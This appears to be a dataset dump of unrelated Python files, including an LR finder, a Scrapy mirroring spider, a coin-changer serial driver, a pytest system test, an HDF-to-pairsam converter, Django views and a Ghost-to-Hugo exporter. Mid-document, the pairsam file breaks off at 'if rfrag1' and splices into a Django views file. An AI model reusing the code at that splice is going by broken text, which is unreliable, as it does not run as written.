best_loss = 0.\r\n    batch_num = 0\r\n    losses = []\r\n    log_lrs = []\r\n\r\n    model.train()\r\n    for i, (images, _) in enumerate(data_loader):\r\n        batch_num += 1\r\n\r\n        images = Variable(images.to(device))\r\n\r\n        outputs = model(images)\r\n        loss = loss_fn(outputs, images)\r\n\r\n        train_loss = loss.cpu().data * images.size(0)\r\n\r\n        avg_loss = beta * avg_loss + (1-beta) * train_loss\r\n        smoothed_loss = avg_loss / (1 - beta**batch_num)\r\n\r\n        if batch_num > 1 and smoothed_loss > 4 * best_loss:\r\n            return log_lrs, losses\r\n        if smoothed_loss < best_loss or batch_num==1:\r\n            best_loss = smoothed_loss\r\n\r\n        losses.append(smoothed_loss)\r\n        log_lrs.append(math.log10(lr))\r\n\r\n        optimizer.zero_grad()\r\n        loss.backward()\r\n        optimizer.step()\r\n\r\n        lr *= mult\r\n        optimizer.param_groups[0]['lr'] = lr\r\n        sys.stdout.write('\\r[ %d/%d] LR: %f' % (i, len(data_loader), lr))\r\n\r\n    return log_lrs, losses\r\n\r\n\r\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\r\nmodel = AutoEncoder().to(device)\r\noptimizer = Adam(model.parameters(), lr=0.01, weight_decay=0.0001)\r\n# optimizer = AdamW(model.parameters(), lr=0.01, weight_decay=0.0001)\r\n# optimizer = SGD(model.parameters(), lr=0.05)\r\n# loss_fn = nn.CrossEntropyLoss()\r\nloss_fn = nn.MSELoss()\r\ndata_loader_train = load_data('./data', 128)\r\nlogs,losses = find_lr(model = model, data_loader = data_loader_train, device = device)\r\nplt.plot(logs[10:-5],losses[10:-5])\r\nplt.show()\r\n","sub_path":"Semi Supervised/find_lr.py","file_name":"find_lr.py","file_ext":"py","file_size_in_byte":2585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"410178041","text":"import scrapy\nimport os\nimport datetime\n\nclass WebSpider(scrapy.Spider):\n    name = 'web'\n\n    def __init__(self, base_url='', default_path=\"resources\", folder_name='', year=''):\n        assert base_url != '' and folder_name != ''\n\n        self.default_path = default_path\n        self.start_urls = [base_url]\n        if '.' in base_url:\n            base_url = '/'.join(base_url.split('/')[:-1])\n        self.allowed_prefix = base_url.rstrip('/') + '/'\n        year = year if year else datetime.datetime.now().year\n        self.folder_name = \"%s-%s\" %(folder_name, year)\n        self.allowed_domains = []\n\n        assert not os.path.exists(\"%s/%s\" %(self.default_path, self.folder_name))\n\n        for url in self.start_urls:\n            self.allowed_domains.append(url.split('/')[2])\n        scrapy.Spider.__init__(self)\n\n    def parse(self, response):\n        yield {'url': response.url}\n\n        full_path = \"%s/%s/%s\" % (self.default_path, self.folder_name, response.url[len(self.allowed_prefix):])\n        directory = full_path[:full_path.rfind('/')]\n        file_name = full_path[full_path.rfind('/') + 1:]\n        if not file_name:\n            full_path = full_path + \"index.html\"\n        try:\n            os.makedirs(directory)\n        except:\n            pass\n\n        with open(full_path, 'wb') as f:\n            f.write(response.body)\n\n        if response.headers['Content-Type'] == 'text/html':\n            content = open(full_path).read()\n            f = open(full_path, 'w')\n            f.write(content.replace(self.allowed_prefix, '').replace('/' + '/'.join(self.allowed_prefix.split('/')[3:]), ''))\n            next_pages = response.css('*::attr(href)').extract()\n            for page in next_pages:\n                if page is not None:\n                    new_link = response.urljoin(page)\n                    if new_link.startswith(self.allowed_prefix):\n                        yield scrapy.Request(new_link, callback=self.parse)","sub_path":"web/spiders/web.py","file_name":"web.py","file_ext":"py","file_size_in_byte":1946,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"167038761","text":"#!/usr/bin/env python3\n\nf = open(\"newFile.txt\", \"w\")\n\n# need rge end of line to go to next line\nf.write(\"blah\")\nf.write(\" blah again \\n\")\nf.write(\"A new line \\n\")\n\n# example of formatted writing (j, x, t) is a tuple\nj = 36\nx = 34.12\nt = \"blah\"\nf.write(\"An integer %d then a float %f then a string %s \\n\" % (j, x, t))\n\n# I could stich my variables into a string instead.\n# Then I can do anything I want with the string...\n# including writing it to the file\nu =  \"A float %f\" % x\nf.write(u + \"\\n\")\n\n# Here is how I could control the floating format\nu =  \"A float with 8 decimal digits %.8f\" % x   # 8 decimal digits\nf.write(u + \"\\n\")\n\n# Fixed width of 9 with 3 decimal digits\nx = 34.12\ny = 1289.98\nu =  \"A float width 9 %9.3f\" % x   \nv =  \"A float width 9 %9.3f\" % y   \nf.write(u + \"\\n\" + v + \"\\n\")\n\n# And now exponential\nf.write(\"Exponential = %e\" % y)\n\n# And there are many more ways of controling the output\n# Note: this is the \"old-style\" formatting.\n# The \"new style\" uses the string.format(...) syntax\n\n\nf.close()\n","sub_path":"campagnari/python/demoWriteFile.py","file_name":"demoWriteFile.py","file_ext":"py","file_size_in_byte":1018,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"651805390","text":"# update list of clauses\ndef update_clauses(clauses, truthvalues):\n    changed = False\n    for clause in [*clauses]:\n        clause_not_removed = True\n        for literal in [*truthvalues]:\n\n            if (literal in clause) & clause_not_removed:\n                # verwijder de clause waarin een waarde staat die al waar is.\n                if truthvalues[literal]:\n                    changed = True\n                    clauses.remove(clause)\n                    clause_not_removed = False\n                if -literal in clause:\n                    changed = True\n                    clause.remove(-literal)\n\n                # verwijder een literal uit een clause waarvan je weet dat die niet waar is.\n                if not truthvalues[literal]:\n                    changed = True\n                    clause.remove(literal)\n\n                if -literal in clause:\n                    changed = True\n                    clauses.remove(clause)\n                    clause_not_removed = False\n    return changed\n\n\ndef update_literals(literal, negative_literals, positive_literals, all_literals):\n\n    if literal in all_literals:\n        all_literals.remove(literal)\n    if -literal in all_literals:\n        all_literals.remove(-literal)\n    if literal in negative_literals:\n        negative_literals.remove(literal)\n    if -literal in negative_literals:\n        negative_literals.remove(-literal)\n    if literal in positive_literals:\n        positive_literals.remove(literal)\n    if -literal in positive_literals:\n        positive_literals.remove(-literal)\n\n","sub_path":"updates.py","file_name":"updates.py","file_ext":"py","file_size_in_byte":1557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"7194148","text":"import os, PIL, glob\nimport tkinter as tk\nimport tkinter.font as tkFont\n\nROOT_DIR = os.path.dirname(os.path.abspath(__file__))\n\nclass UiNotification(tk.Canvas):\n    def __init__(self, texts, master=None):\n        tk.Canvas.__init__(\n            self, master, \n            width=220, height=120,\n            borderwidth=0,\n            highlightthickness=0,\n        )\n    \n        self.master = master\n        self.texts = texts\n\n        self.is_notification_animating = False\n\n    def create_print_notification(self):\n        self.place(relx=0.5, rely=0, anchor=\"n\", y=-60)\n        \n        params = {\n            'notif_bg': \"#ddf1d1\",\n            'notif_border_bg': \"#64b747\",\n            'tag': 'print_notification',\n            'icon_type': \"printer\",\n            'texts_key': \"printing\"\n        }\n\n        self.notification_creator(params)\n\n        self.animate_notification_in(\"print_notification\")\n\n    def create_error_notification(self, texts_key = \"\"):\n        self.place(relx=0.5, rely=0, anchor=\"n\", y=-60)\n        \n        params = {\n            'notif_bg': \"#f1d1d9\",\n            'notif_border_bg': \"#b74747\",\n            'tag': 'error_notification',\n            'icon_type': \"error\",\n            'texts_key': texts_key\n        }\n\n        self.notification_creator(params)\n\n        if self.is_notification_animating == False:\n            self.animate_notification_in(\"error_notification\")\n\n    def notification_creator(self, params):\n        notification_container = tk.Frame(\n            self, \n            text = None,\n            padx = 5,\n            pady = 5,\n            bg = params['notif_bg'],\n            borderwidth=2,\n            relief=\"flat\",\n            highlightbackground=params['notif_border_bg'],\n            highlightthickness=2,\n            width=self['width'],\n            height=60\n        )\n        notification_container.pack_propagate(0)\n\n        self.create_window(0, 0, \n            window=notification_container, \n            anchor=\"nw\", \n            tag=params['tag'],\n        )\n\n        countdown_label_style = tkFont.Font(\n            family='DejaVu Sans Mono', \n            size=12\n        )\n\n        btn_icon_src = PIL.Image.open(\n            f\"{ROOT_DIR}/../assets/{params['icon_type']}-icon.png\"\n        ).convert(\"RGBA\")\n        btn_icon_src = btn_icon_src.resize((30, 30), PIL.Image.ANTIALIAS)\n        btn_bgc_tmp = PIL.Image.composite(\n            btn_icon_src,\n            PIL.Image.new(\n                'RGB', \n                btn_icon_src.size,\n                notification_container[\"bg\"]\n            ),\n            btn_icon_src\n        )\n        btn_icon = PIL.ImageTk.PhotoImage(btn_bgc_tmp)\n\n        label = tk.Label(\n            notification_container, \n            image=btn_icon, \n            bg=notification_container[\"bg\"]\n        )\n        label.image = btn_icon\n        label.pack(side=\"left\", padx=(15, 15))\n        \n        label = tk.Label(\n            notification_container, \n            text=self.texts[params[\"texts_key\"]],\n            font = countdown_label_style,\n            bg=notification_container[\"bg\"],\n            justify=\"left\"\n         )\n        label.pack(side=\"left\")\n\n    def animate_notification_in(self, tag_name):\n        x_pos, y_pos = self.coords(tag_name)\n\n        if(y_pos < 60):\n            self.move(tag_name, 0, 1)\n            self.master.after(1, lambda: 
self.animate_notification_in(tag_name))\n        else:\n            self.is_notification_animating = True\n            self.master.after(1500, lambda: self.animate_notification_out(tag_name))\n\n    def animate_notification_out(self, tag_name):\n        x_pos, y_pos = self.coords(tag_name)\n\n        if(y_pos > 0):\n            self.move(tag_name, 0, -1)\n            self.master.after(1, lambda: self.animate_notification_out(tag_name) )\n        else:\n            self.is_notification_animating = False\n            self.place_forget()\n","sub_path":"software/classes/UiNotification.py","file_name":"UiNotification.py","file_ext":"py","file_size_in_byte":3881,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"496632616","text":"__author__ = 'Miguel'\r\n\r\n\"\"\" Imports \"\"\"\r\nimport threading\r\nfrom time import sleep\r\n\r\nimport serial\r\n\r\nfrom VMC.Utils import Commands\r\n\r\n\r\nclass ChangerThread(threading.Thread):\r\n    \"\"\"\r\n     Class ChangerThread.\r\n      Thread for COM connection and data handling with the changer.\r\n\r\n      TODO: Define if the platform is Windows or Unix.\r\n    \"\"\"\r\n\r\n    \"\"\" Global Variables \"\"\"\r\n    # COM variables\r\n    com_port_number = 0\r\n    com_port = None\r\n\r\n    # Commands and VMCCommands object\r\n    commands = Commands.VmcCommands()\r\n\r\n    # Flags\r\n    is_writing = False\r\n    is_polling = False\r\n    must_dispense = False\r\n    must_reset = False\r\n\r\n    # Thread Communication\r\n    socket_receive = []\r\n    socket_response = \"\"\r\n\r\n    def open_com(self):\r\n        \"\"\" Creates and opens the serial port. \"\"\"\r\n        \"\"\"\r\n        coms = []\r\n\r\n        print('Searching COMs...')\r\n        for i in range(0, 255):\r\n            try:\r\n                av_port = serial.Serial(i)\r\n                coms.append(\"COM\" + str(i + 1))\r\n                av_port.close()\r\n            except serial.SerialException:\r\n                pass\r\n\r\n        print(coms)\r\n\r\n        self.com_port_number = int(raw_input('Select COM port: ')) - 1\r\n        \"\"\"\r\n\r\n        self.com_port = serial.Serial('/dev/tty.usbserial', 115200, timeout=1, parity=serial.PARITY_NONE, rtscts=1)\r\n\r\n        if self.com_port.isOpen():\r\n            self.com_port.close()\r\n        self.com_port.open()\r\n\r\n        print('{} is open.'.format(self.com_port.name))\r\n\r\n    def write_cmd(self, cmd=Commands.VmcCommands(), in_waiting=0, sleep_thread=0.25):\r\n        \"\"\"\r\n         Method for sending a command via serial port.\r\n          Defaults: waits for 0 byte on the serial buffer, sleeps the thread for 100ms.\r\n        \"\"\"\r\n\r\n        # Try to open the serial port. 
First check if it's open already.\r\n        try:\r\n            if self.com_port.isOpen():\r\n\r\n                # Write the command (see Commands.py) to the serial port, and print it.\r\n                self.com_port.write(cmd['cmd'])\r\n                print('{} cmd sent'.format(cmd['name']))\r\n\r\n                # Sleep the thread until we have the minimum required data or until we have a timeout (default=500ms).\r\n                \"\"\"\r\n                timeout = 0\r\n                while self.com_port.inWaiting() < in_waiting and timeout < 10:\r\n                    timeout += 1\r\n                    sleep(.5)\r\n                if timeout >= 10:\r\n                    raise serial.SerialException\r\n                \"\"\"\r\n\r\n                # Read the required bytes from the serial port.\r\n                data = ''\r\n\r\n                if in_waiting > 0:\r\n                    while not data[-2:] == 'X9':\r\n                        data += self.com_port.read()\r\n                    # Evaluate the data received.\r\n                    # If the last two bytes are 'X9' then we have a correct package.\r\n                    if data[-2:] == 'X9':\r\n                        print('Correct byte received: {}'.format(data))\r\n                    else:\r\n                        print('Wrong byte: {}'.format(data))\r\n\r\n                    sleep(sleep_thread)\r\n                else:\r\n                    print(self.com_port.readline())\r\n\r\n                self.com_port.flushInput()\r\n                self.com_port.flushOutput()\r\n\r\n        except serial.SerialException:\r\n            # If a SerialException is catch then must restart the communication.\r\n            self.must_reset = True\r\n            sleep(sleep_thread)\r\n\r\n    def write_poll(self):\r\n        \"\"\" Writes a Poll command. \"\"\"\r\n        self.write_cmd(self.commands.POLL, 6)\r\n\r\n    def write_reset(self):\r\n        \"\"\" Writes a Reset command. \"\"\"\r\n        self.write_cmd(self.commands.RESET, 4, 1)\r\n        sleep(.5)\r\n\r\n    def write_setup(self):\r\n        \"\"\" Writes a Setup command. \"\"\"\r\n        self.write_cmd(self.commands.SETUP, 1)\r\n        self.write_cmd(self.commands.ACK)\r\n\r\n    def write_tube_status(self):\r\n        \"\"\" Writes a Status command. \"\"\"\r\n        self.write_cmd(self.commands.TUBE_STATUS, 1)\r\n        self.write_cmd(self.commands.ACK)\r\n\r\n    def write_coin_type(self):\r\n        \"\"\" Writes a Coin Type command. \"\"\"\r\n        self.write_cmd(self.commands.COIN_TYPE, 1)\r\n\r\n    def write_dispense(self, units=0, cents=0):\r\n        \"\"\" Writes a Dispense command. Also evaluates which coins should be dispensed. 
\"\"\"\r\n        # Evaluate coins.\r\n        res = units\r\n        quantity_10 = res / 10\r\n        res %= 10\r\n        quantity_5 = res / 5\r\n        res %= 5\r\n        quantity_2 = res / 2\r\n        res %= 2\r\n        quantity_1 = res / 1\r\n\r\n        quantity_50c = cents / 5\r\n\r\n        # Dispense coins depending on the coins it should dispense.\r\n        if not quantity_10 == 0:\r\n            self.write_cmd(self.commands.dispense_10(quantity_10), 2)\r\n        if not quantity_5 == 0:\r\n            self.write_cmd(self.commands.dispense(quantity_5, 4), 0)\r\n        if not quantity_2 == 0:\r\n            self.write_cmd(self.commands.dispense(quantity_2, 3), 0)\r\n        if not quantity_1 == 0:\r\n            self.write_cmd(self.commands.dispense(quantity_1, 2), 0)\r\n        if not quantity_50c == 0:\r\n            self.write_cmd(self.commands.dispense(quantity_50c, 0), 0)\r\n\r\n    def init_sequence(self):\r\n        \"\"\" Initialization sequence. \"\"\"\r\n        print('Reset sequence activated')\r\n        self.write_reset()\r\n        self.write_poll()\r\n        self.write_setup()\r\n        self.write_tube_status()\r\n        self.write_coin_type()\r\n\r\n    def run(self):\r\n        \"\"\" Run method for the thread. \"\"\"\r\n\r\n        # First run.\r\n        # Must not reset and start the initialization sequence.\r\n        while 1:\r\n            self.must_reset = False\r\n            self.init_sequence()\r\n            while not self.must_reset:\r\n                # If we must not dispense a coin then poll the device.\r\n                # Else, dispense the required coins.\r\n                if not self.must_dispense:\r\n                    self.is_polling = True\r\n                    self.write_poll()\r\n                    self.is_polling = False\r\n                elif self.must_dispense:\r\n                    self.is_polling = True\r\n                    self.write_dispense(self.socket_receive[0], self.socket_receive[1])\r\n                    self.is_polling = False\r\n                    self.must_dispense = False\r\n                    self.socket_response = 'Dispensed: {}.{}'.format(self.socket_receive[0], self.socket_receive[1])\r\n\r\n    def __init__(self):\r\n        \"\"\" Initialization of the thread. \"\"\"\r\n        super(ChangerThread, self).__init__()\r\n        self.open_com()","sub_path":"VMC/Coin_Changer/ChangerThread.py","file_name":"ChangerThread.py","file_ext":"py","file_size_in_byte":6599,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"486162572","text":"#!/usr/bin/env python2\n# coding=utf-8\nimport os\nimport time\nimport pytest\nimport psutil\nimport requests\nimport logging\nlogging.basicConfig(format='%(asctime)s [%(levelname)s] %(message)s', level=logging.INFO)\nlogging.disable(logging.DEBUG)\nlog = logging.getLogger(__file__)\n\n\nQTS_PROCESS = 'qts'\nWFE_URL = 'http://localhost:12345/processes'\nMM_URL = 'http://localhost:12345/entities/program/{}'\n\n\ndef wait(timeout=10, interval=1):\n    \"\"\"\n    Useful wait decorator.\n    Usage with function declaration: @wait(60, 1)\n    Usage in test code: wait(60)(func_to_wait)(func_params)\n    Return: last or successful func_to_wait(func_params) result\n    \"\"\"\n    def what(func):\n        def whit_args(*args):\n            end_time = time.time() + timeout\n            result = func(*args)\n            while not result and time.time() < end_time:\n                time.sleep(interval)\n                result = func(*args)\n            return result\n        return whit_args\n    return what\n\n\n@wait(180)\ndef check_wfe_status(process, expected_status):\n    \"\"\"Return True if process has expected status in Workflow Engine API\"\"\"\n    status = [proc['status'] for proc in requests.get(WFE_URL).json() if proc['name'] == process]\n    # Assume that process name is unique\n    return status and status[0] == expected_status\n\n\n@pytest.fixture(autouse=True)\ndef run_qts_mock():\n    # Imports are here, because this function is needed only to simulate work of QTS.\n    # If set autouse=False and delete mock, then these imports won't affect test case.\n    from qts_mock import ApiMock, consume_xml\n    from BaseHTTPServer import HTTPServer\n    from threading import Thread\n    qts = Thread(target=consume_xml)\n    qts.daemon = True\n    qts.start()\n    serv = HTTPServer((\"localhost\", 12345), ApiMock)\n    wfe = Thread(target=serv.serve_forever)\n    wfe.start()\n    yield\n    serv.shutdown()\n\n\ndef test_qts():\n    log.info(\"TestCase: Positive QTS system test\")\n    dir_name, xml_name, program = 'qts_watch_folder', 'test.xml', 'program_name'\n\n    log.info(\"Step: Put xml file {} into directory {}\".format(xml_name, dir_name))\n    template = '{}'.format(program)\n    with open(os.path.join(dir_name, xml_name), 'wt') as f:\n        f.write(template)\n\n    log.info(\"Step: Verify that QTS process is running and file is consumed\")\n    assert [p.cmdline() for p in psutil.process_iter() if QTS_PROCESS in str(p.cmdline())],\\\n        'Expected process {} is not running'.format(QTS_PROCESS)\n    assert wait(60)(lambda: xml_name not in os.listdir(dir_name))(),\\\n        'File was not consumed within 60 sec'\n\n    log.info(\"Step: Verify Workflow Engine process status\")\n    wfe_processes = requests.get(WFE_URL)\n    assert wfe_processes.status_code == 200,\\\n        'WFE returned error code {}'.format(wfe_processes.status_code)\n    assert 'application/json' in wfe_processes.headers['content-type'],\\\n        'WFE returned unexpected content'\n    assert check_wfe_status(program, 'running'), 'Process {} was not running'.format(program)\n    # If we need warnings about long processing, then it is possible to use chain of check_wfe_status,\n    # but decorator should be changed @wait(60).\n    # if not check_wfe_status(program, 'completed'):\n    #     log.warn('Process {} was not finished within 60 sec'.format(program))\n    # if not check_wfe_status(program, 'completed'):\n    #     log.warn('Process {} was not finished even in 120 
sec'.format(program))\n    assert check_wfe_status(program, 'completed'),\\\n        'Process {} was not finished within 180 sec'.format(program)\n\n    log.info(\"Step: Verify that {} is in DB\".format(program))\n    assert requests.get(MM_URL.format(program)).status_code == 200,\\\n        '{} is absent in DB according to MediaManager API'.format(program)\n\n\nif __name__ == '__main__':\n    pytest.main(['-s', '-v'])\n","sub_path":"async_system/qts_test.py","file_name":"qts_test.py","file_ext":"py","file_size_in_byte":3842,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"128050868","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nfrom collections import OrderedDict\nimport subprocess\nimport fileinput\nimport itertools\nimport click\nimport pipes\nimport sys\nimport os\nimport io\nimport copy\nimport h5py\nimport pickle\n\nfrom . import _fileio, _pairsam_format, _headerops, cli, common_io_options\nfrom .pairsam_stats import PairCounter\n\n\nUTIL_NAME = 'pairsam_hdf2pairsam'\n\nEXTRA_COLUMNS = [\n    'mapq',\n    'pos5',\n    'pos3',\n    'cigar',\n    'read_len',\n    'matched_bp',\n    'algn_ref_span',\n    'algn_read_span',\n    'dist_to_5',\n    'dist_to_3',\n    'rfrag',\n    'rfrag_dist',\n    'rfrag_dist_up',\n    'rfrag_dist_down'\n]\n\n@cli.command()\n@click.argument(\n    'hdf_path',\n    type=str,\n    required=False)\n@click.option(\n    \"-o\", \"--output\", \n    type=str, \n    default=\"\", \n    help='output file. '\n        ' If the path ends with .gz or .lz4, the output is pbgzip-/lz4-compressed.'\n         'By default, the output is printed into stdout. ')\n@click.option(\n    \"-f\", \"--frags\",\n    type=str,\n    required=False,\n    help='a tab-separated BED file with the positions of restriction fragments '\n         '(chrom, start, end). Can be generated using cooler digest.')\n\n@common_io_options\n\ndef hdf2pairsam(hdf_path, output, **kwargs):\n    '''parse .hdf5 and make .pairsam.\n\n    SAM_PATH : input .sam file. If the path ends with .bam, the input is \n    decompressed from bam. By default, the input is read from stdin.\n    '''\n    parse_hdf(hdf_path, output, **kwargs)\n\n\ndef parse_hdf(hdf_path, output, **kwargs):\n\n\n    infile = h5py.File(hdf_path)\n\n    outstream = (_fileio.auto_open(output, mode='w',\n                                   nproc=kwargs.get('nproc_out'),\n                                   command=kwargs.get('cmd_out', None)) \n                 if output else sys.stdout)\n\n    write_pairsam(infile, outstream, **kwargs)\n\n    if outstream != sys.stdout:\n        outstream.close()\n\ndef write_pairsam(infile, out_file, **kwargs):\n\n    infile_d = {\"chrms1\": infile['chrms1'].value,\n                \"chrms2\": infile['chrms2'].value,\n                \"pos1\": infile['cuts1'].value,\n                \"pos2\": infile['cuts2'].value,\n                \"strand1\": infile['strands1'].value,\n                \"strand2\": infile['strands2'].value,\n                }\n\n    idx2label = pickle.loads(infile['misc'].value)['genome']['idx2label']\n\n    #reading rfrags\n    if len(kwargs['frags'])>0:\n        frags = kwargs['frags']\n\n        import numpy as np\n        from numpy.lib.recfunctions import append_fields  # for rfrags indexing\n\n        rfrags = np.genfromtxt(\n            frags, delimiter='\\t', comments='#', dtype=None,\n            names=['chrom', 'start', 'end', 'idx'])\n\n        rfrags.sort(order=['chrom', 'start', 'end'])\n\n        rfrags = append_fields(rfrags, 'idx', np.arange(len(rfrags)))\n        rfrags['end'] += 1\n\n        chrom_borders = np.r_[0,\n                              1 + np.where(rfrags['chrom'][:-1] != rfrags['chrom'][1:])[0],\n                              rfrags.shape[0]]\n        rfrags = {rfrags['chrom'][i]: rfrags[['end', 'idx']][i:j]\n                  for i, j in zip(chrom_borders[:-1], chrom_borders[1:])}\n\n        print('Rfrags read')\n\n\n    out_file.write(\"#columns: readID chrom1 pos1 chrom2 pos2 strand1 strand2 pair_type rfrag1 rfrag2\")\n    out_file.write(\"\\n\")\n\n    for i in range(len(infile_d[\"chrms1\"])):\n\n        if 
(infile_d['chrms1'][i]<0) or (infile_d['chrms2'][i]<0):\n            continue\n\n        chr1 = \"chr\"+idx2label[infile_d['chrms1'][i]]\n        chr2 = \"chr\"+idx2label[infile_d['chrms2'][i]]\n\n        rfrag1, _, _ = \\\n            find_rfrag(rfrags, chr1, infile_d['pos1'][i] + (10 if infile_d['strand1'][i] else -10))\n        rfrag2, _, _ = \\\n            find_rfrag(rfrags, chr2, infile_d['pos2'][i] + (10 if infile_d['strand2'][i] else -10))\n\n        if rfrag1 0:\r\n                next_q_instance = next_q.first()\r\n                return redirect(\"questions:single\", qid=next_q_instance.id)\r\n            else:\r\n                messages.add_message(request, messages.INFO,\r\n                    \"You've answered all of the questions. (For now!)\")\r\n                return redirect(\"home\")\r\n\r\n        context = {\r\n            \"form\": form,\r\n            \"instance\": instance,\r\n        }\r\n        return render(request, \"questions/single.html\", context)\r\n    else:\r\n        raise Http404\r\n\r\n\r\ndef interest_single(request, slug):\r\n\r\n    if request.user.is_authenticated:\r\n        interest = Interest.objects.all().order_by('timestamp')\r\n        instance = get_object_or_404(Interest, slug=slug)\r\n        try:\r\n            user_answer = AnswerInterest.objects.get(user=request.user, interest=instance)\r\n            updated_q = True\r\n        except AnswerInterest.DoesNotExist:\r\n            user_answer = AnswerInterest()\r\n            updated_q = False\r\n        except AnswerInterest.MultipleObjectsReturned:\r\n            user_answer = AnswerInterest.objects.filter(user=request.user, interest=instance)[0]\r\n            updated_q = True\r\n        except:\r\n            user_answer = AnswerInterest()\r\n            updated_q = False\r\n\r\n        form = AnswerInterestForm(request.POST or None)\r\n        if (form.is_valid() and request.user.is_authenticated):\r\n            user_answer.user = request.user\r\n            user_answer.interest = Interest.objects.filter(slug=slug).first()\r\n            user_answer.response = form.cleaned_data.get('response')\r\n            user_answer.timestamp = datetime.datetime.now()\r\n            user_answer.save()\r\n\r\n            next_q = Interest.objects.get_unanswered(user=request.user).order_by(\"?\")\r\n            if next_q.count() > 0:\r\n                next_q_instance = next_q.first()\r\n                return redirect(\"questions:interest_single\", slug=next_q_instance.slug)\r\n            else:\r\n                messages.add_message(request, messages.INFO,\r\n                    \"You've answered all of the interest questions. (For now!)\")\r\n                return redirect(\"home\")\r\n\r\n        context = {\r\n            \"form\": form,\r\n            \"instance\": instance,\r\n        }\r\n        return render(request, \"questions/single_interest.html\", context)\r\n    else:\r\n        raise Http404\r\n","sub_path":"neurosphere/questions/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4981,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"163491344","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\nimport sqlite3\nimport json\nfrom datetime import datetime\n\n\n# optional usage to remove accents on tag names\n# -------------\nimport unicodedata\ndef remove_accents(input_str):\n    nkfd_form = unicodedata.normalize('NFKD', unicode(input_str))\n    return u\"\".join([c for c in nkfd_form if not unicodedata.combining(c)])\n# -------------\n\nconn = sqlite3.connect('ghost-dev.db')\nconn.row_factory = sqlite3.Row\n\nc = conn.cursor()\nc2 = conn.cursor()\n\nl = []\n\nfor i in c.execute('''\nSELECT id, title, meta_description as description, slug, markdown as text,\nstatus as draft, page, meta_title, image,\nDATE(published_at/1000, \"unixepoch\") as date,\nDATE(created_at/1000, \"unixepoch\") as date2\nFROM posts'''):\n    g = {i.keys()[e]: tuple(i)[e] for e in range(len(i.keys()))}\n    t = (i['id'],)\n    g['tags'] = [e['name'] for e in c2.execute('''\n    SELECT t.name FROM posts_tags pt JOIN tags t ON pt.tag_id = t.id\n    WHERE pt.post_id=?''', t)]\n\n    if g['date'] == None:\n        g['date'] = g['date2']\n    if g['draft'] == 'published':\n        g['draft'] = False\n    else:\n        g['draft'] = True\n    g.pop('date2')\n\n    # post description\n    if g['description'] == None:\n        g['description'] = \"\"\n\n    # post content    \n    text = g.pop('text')\n    text = text.replace(\"# \", \"#\")\n    text = text.replace(\"#\", \"# \")\n    text = text.replace(\"# # # \", \"### \")\n    text = text.replace(\"# # \", \"## \")\n    text = text.replace(\"\\# \", \"\\#\")\n\n    # post type\n    if g['page'] == True:\n        page = 'page'\n    else:\n        page = 'post'\n    g['type'] = page\n    g.pop('page')    \n\n    with open('./content/%s.md' % (g['slug']), 'w') as post_file:\n        post_file.write('+++\\n')\n        post_file.write('type = \"%s\"\\n' % g['type'])\n        post_file.write('date = \"%s\"\\n' % g['date'])\n        post_file.write('title = \"%s\"\\n' % g['title'].encode('utf8'))\n        post_file.write('description = \"%s\"\\n' % g['description'].encode('utf8'))\n        post_file.write('slug = \"%s\"\\n' % g['slug'])\n        \n        post_file.write('tags = [')\n\n        # encode each tag to accept accents or removed them\n        # and add a comma to separate each one\n        for i in xrange(0, len(g['tags'])):\n            if i < len(g['tags']) - 1 :\n                separator = \", \"\n            else:\n                separator = \"\"\n            \n            # encode string to keep accents etc. E.g. \"Introdução e Avaliações\"\n            tag = g['tags'][i].encode('utf8')\n\n            # uncomment if you like to remove accents. E.g. \"Introducao e Avaliacoes\"\n            tag = remove_accents(g['tags'][i])\n\n            post_file.write('\"%s\"' % tag+separator)\n\n        post_file.write(']\\n')\n\n        post_file.write('+++\\n\\n')\n        post_file.write(text.encode('utf8'))\n","sub_path":"ghost2hugo.py","file_name":"ghost2hugo.py","file_ext":"py","file_size_in_byte":2785,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"619351727","text":"import requests\nimport json\n\nf = open('data.txt', 'r')\nline = f.readline()\nresultLines = []\nwhile line:\n    result = line.split(\",\")[4] + line.split(\",\")[5] + line.split(\",\")[6]\n    r = requests.get(url=\"http://search.maps.sputnik.ru/search?q=\"+result)\n    y = json.loads(r.text)\n    lat = (y[\"result\"][0][\"position\"][\"lat\"])\n    lon = (y[\"result\"][0][\"position\"][\"lon\"])\n    line = line.replace(\"NULL\", str(lat), 1)\n    line = line.replace(\"NULL\", str(lon), 1)\n    resultLines.append(line)\n    line = f.readline()\nf.close()\nf = open('data.txt', 'w')\nf.writelines(resultLines)\nf.close()\n","sub_path":"task.py","file_name":"task.py","file_ext":"py","file_size_in_byte":587,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
